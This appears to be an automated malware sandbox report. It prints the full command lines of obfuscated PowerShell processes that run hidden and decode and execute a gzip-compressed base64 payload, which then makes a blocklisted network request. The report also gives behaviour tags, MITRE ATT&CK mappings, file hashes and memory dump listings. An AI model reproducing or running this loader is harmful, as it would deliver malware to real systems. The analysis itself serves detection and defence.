EQAQgBRAGQANwB1AHoARwBnAHYAVQBTAE4ASgBTAGYANgBrACcAJwArACcAJwA2AFIAcwA4ADkAeQBOAGwAQwA4AEMAYwB7ADIAfQAnACcAKwAnACcALwBvADYANAB4AFgAdAAvADAAbgB5AEMAdgBiAHUAJwAnACsAJwAnAFUASgB4AEcAVQBDAE0AVABNAHMAVwB4AHAAdABlAGgAQwBqAHoAbwBmAGIAawBVAHUAYwBDAEgAeQBFAE8AUAAwAEUAeABiAGUAMABTAGMAeABiAHoAVgBVAHAATwBFADYAbgBIADMAOABvAHIAVwBmADYAcQAvAHAANwBiAC8AWQBhAEsATQAxAEMAUgBLAEUAdQBZAGEAewAxAH0AZQB1AHEAUABHAFUAdQAwADgASgBxAGUATQBGAEIAeQB7ADIAfQBlAE4AeQA0AHQAagB7ADIAfQBOAE0AWQBVAGQAQgBiAGEAWQBTADEAdABSAEsARwBWAGUATQBhAGEATABnAFEAbwBiAHcAbQBsAHUARgAyAHUARQByAFIAOQBOAGUAdQB1AHQASQBuAHcAbQByAEwAdwBNADcAOAB2AFIAeAA0ADgATABNAEIATAA2AFYATgBGAEUAYQB7ADIAfQBNAGMAQgB6AHkAcwBTAHYAdQBXAEoATQBIAFkAbABmAGEAUwBmAEcAeABKADMAKwA1AGEAaAB5AFUASAA4AFMAewAyAH0AcwBXAGcAegB1AEEAcABxAEwAJwAnACsAJwAnAGMASABvAFUARAB2AEwASQBXAGgARABGADcANAA4AFcANwBHAGMAYwBCAHMAVwA3AGUATAAwAEgASABhAGoAZQBRAG0ATwBIAE8AWABOAHEAdAB3AFcAQQBLAG0AUAAwAE4AWAB3AG4AdgB6ADUAbgB3AG0AdgB3AEEATABVAEcAZQBMADQAcwBOAGoATgBJAEUAVwBDAC8AdwBvADkAQwB7ADIAfQBSAGQAYgB5ACsAcwB0AHEASgBTAEYAMwBlACsAYgBOAGUAZQB7ADEAfQBFAGMASQBmAC8ALwA5AGsAegBjAHYAewAxAH0ALwA3AGoAOQBwAGsAeQBTAHEAawBkAHMAdgBqAHIAOQA4AHUARABWAHMAUAAyAE8AQQBMAHsAMgB9AEkAYwBLAEEAMABZAGYAUgBSAGYARgByAEcAMwBzAFQAaABYAEMAewAyAH0AdgB3AGcAdQB4AGcAUwBwAFkAbgA1AC8AewAyAH0AWAA1AFIASgB6AHEALwBHAHMAUABBAGUAaAArAC8AZgBXAGoAKwBtAHMAUgAwAE4AQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBaACcAJwAsACcAJwBpACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAHd74WcCA7VXa2/{2}Rhf+Xqn/waqQMCoBA042'+'rFSpNmAw{2}7n5lkBRNbEHe2DscexxgLT97z3mssl2k/fdVlpLKPbMuT7nmnUee5ywWKDtyUD448cfhPMzRSmKBLGUrq+rQmntd54qL5el7SRoEeEXQVwqSdJlESLx6uPHTp6mOOan71ofcyXLcPRACc7E{2}vC'+'n4IY4xVeThw32uPCHUPq91qfsAdEz2aGDvBALV0rsF3cj5qHCtJq{1}UMLF8m+/lSvLq8aq1nvMEc3EsnnIOI5qPqXl{2}vBXp'+'VBoHRIslg3{2}pSxja15zSdxq1uw'+'4Q2s8BmlP2MA8{1}H5WBm9e/Ekxz9P47FYh50QlluF1mjJP8f0U{1}1m'+'5K{2}wLDcvV6'+'ldxeVY/z2NOIlzTY45Tlpg4fSIezmoDFPsUz/F6BVwmT0kcrCoVIHt{2}WyyW4pzSqvBvxIhjvLuA961M4msmoJrytFKFqL7lqMH8nO'+'ITa/kNS4tUqMBzSQdA8K'+'8CxPUlhcI8fSODXg4uz/J4g8FkccoycuT9R{1}CqggG6EWfpAT5LVprjyuoz4KCUVb9VVuPC'+'CGybvd2Fo6XD{2}L96EfBF/EtEH{2}QF0fv{1}3MVrEuPuIUYR8S4JK74VE7ym+AhI7UI2BgvF8vkC+11McYB4AXKRGl+x9SLCP/O'+'qOaE+ThUP4pqBVRDyypfGnOImlvXYwBGAd/ouF2GCMsEX6nNpHC7a{2}2'+'8gKncoyrKqMM2hTr2qYGJEsV8VlDgj5ysl5+z4Wn4x18gpJx7K+EXcqvIPOM9qOyzOeJp7EFaAwDIT7BFEC0SqwoD4WD2YJL{2}oL7+JRwdRCtUDkp4gHnBS4GDyIllSv3CTVWom5nqUUBwBxbFraBQF0CPOFXLMLRRgv/yOm{1}c6OCV9gcsFkFdGQrBNynhVcEjKoQcVGBfp9R9s+Lr3HI3ppPgcGvFSXkv1wIsCK'+'D13ESty9AzQEY6UAxRay{2}IV{1}fhGPrU{1}8af6hEwVeO71mBr+cEsa+g5+Bvxs0tJ{1}94P/abg{1}1A2vk03'+'72q1CdsHOux0rnj/0cdt0{1}G72dN6{1}KoM{1}kVQ59FTJKt4bQUCk4F7xx7P'+'Qo9K0F43Gerav7'+'w{1}uIeskw5Plw{1}2ktFrypCVtAb174NsCT0R2+xG8Qz+djFQ9UyWd9oad+YPb1BYuHdRlLVy7LDNv7rv1er3to/419RWV+U2aI2fOrIEXqfW6Y/jcshtjy/45bBV+Wm77Brn77N68bYw2SvCp1wjvgcfvt59RNwtM91pauLvAcrWN3mtbuhY'+'EhjVfjxu3h0+mqnoDNVs4Pr3f8sTv3DaNrp0bprwfmwozpdC27F2m9/cJatrBvOlsU'+'PM20bUF9eJx8tCUnwzLy8cdea9r43ARaQdkvpIxU9mELq4TsBtsflTAbqTOsKJ0WXfXU5ROO0Hd+QbboF/SHo3+vIEG29bC3UsPd8n84Xl+N2uFLU9b2E40j7EzHLnxcON0GkM32nL'+'s8ntLS5rWXXgz7tHBrOE0711qGgP/4MRz1euqkdPkLdPWus4mBBkzCW+G63kvJLYUzp0oGTr99{2}'+'c00NSH5u7auhvm1mbeR60xcpp+/2EQQqjt/bzBFLsf3pFFvV9vu8M9HTOlO2KhBnFo+JYTbVLHlD/AnYuC{1}I105RmcG8p91rP7bO1EYWOe3ACvc4ydEwVcDcOCXtsNbBvpgaVArOdTpSFP647Vuhvf9DKIrvo46wcKIKUg+M0U1UIa2do/39UbC9Atx7HTDBQd7uzGgvUSNJSf6k'+'6Rs89yNlC8Cc{2}'+'/o64xXt/0nyCvbu'+'UJxGUCMTMsWxptehCjzofbkUucCHyEOP0Exbe0ScxbzVUpOE6nH38orWf6q/p7b/YaKM1CRKEuYa{1}euqPGUu08JqeMFBy{2}eNy4tj{2}NMYUdBbaYS1tRKGVeMaaLgQobwmluF2uErR9NeuutInwmrLwM78vRx48LMBL6VNFEa{2}McBzysSvuWJMHYlfaSfGxJ3+5ahyUH8S{2}sWgzuApqL'+'cHoUDvLIWhDF748W7GccBsW7eL0HHajeQmOHOXNqtwWAKmP0NXwnvz5nwmvwALUGeL4sNjNIEWC/wo9C{2}Rdby+stqJSF3e+bNee{1}EcIf//9kzcv{1}/7j9pkySqkdsvjr98uDVsP2OAL{2}IcKA0YfRRfFrG3sThXC{2}vwguxgSpYn5/{2}X5RJzq/GsPAeh+/fWj+msR0NAAA{0}')-f'=','Z','i')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RWVO41XG1DKKL6X2IOC0.temp

Filesize
7KB

MD5
e6db9af9c2fc55b98f0a74f59d6a825f

SHA1
c6ebe9e7441fc120ec324aa9ea47fa4f329ac144

SHA256
42aa87f59b304be3c8a468dc1e997d11e544f785eccb39ebc35e29513e7131b3

SHA512
00a57ffc3de3374a3fbff0168a8be30520cef7cd2dc6d728c7655b0d615139dbb4103d68078cfd60523d37cc71f24faba8b479344508be55b3293baa135a5f2d

Download Submit
memory/2708-14-0x0000000002E10000-0x0000000002E11000-memory.dmp

Filesize
4KB

Download
memory/2800-4-0x000007FEF5E7E000-0x000007FEF5E7F000-memory.dmp

Filesize
4KB

Download
memory/2800-5-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/2800-6-0x0000000001D60000-0x0000000001D68000-memory.dmp

Filesize
32KB

Download
memory/2800-7-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2800-8-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2800-9-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2800-10-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2800-11-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing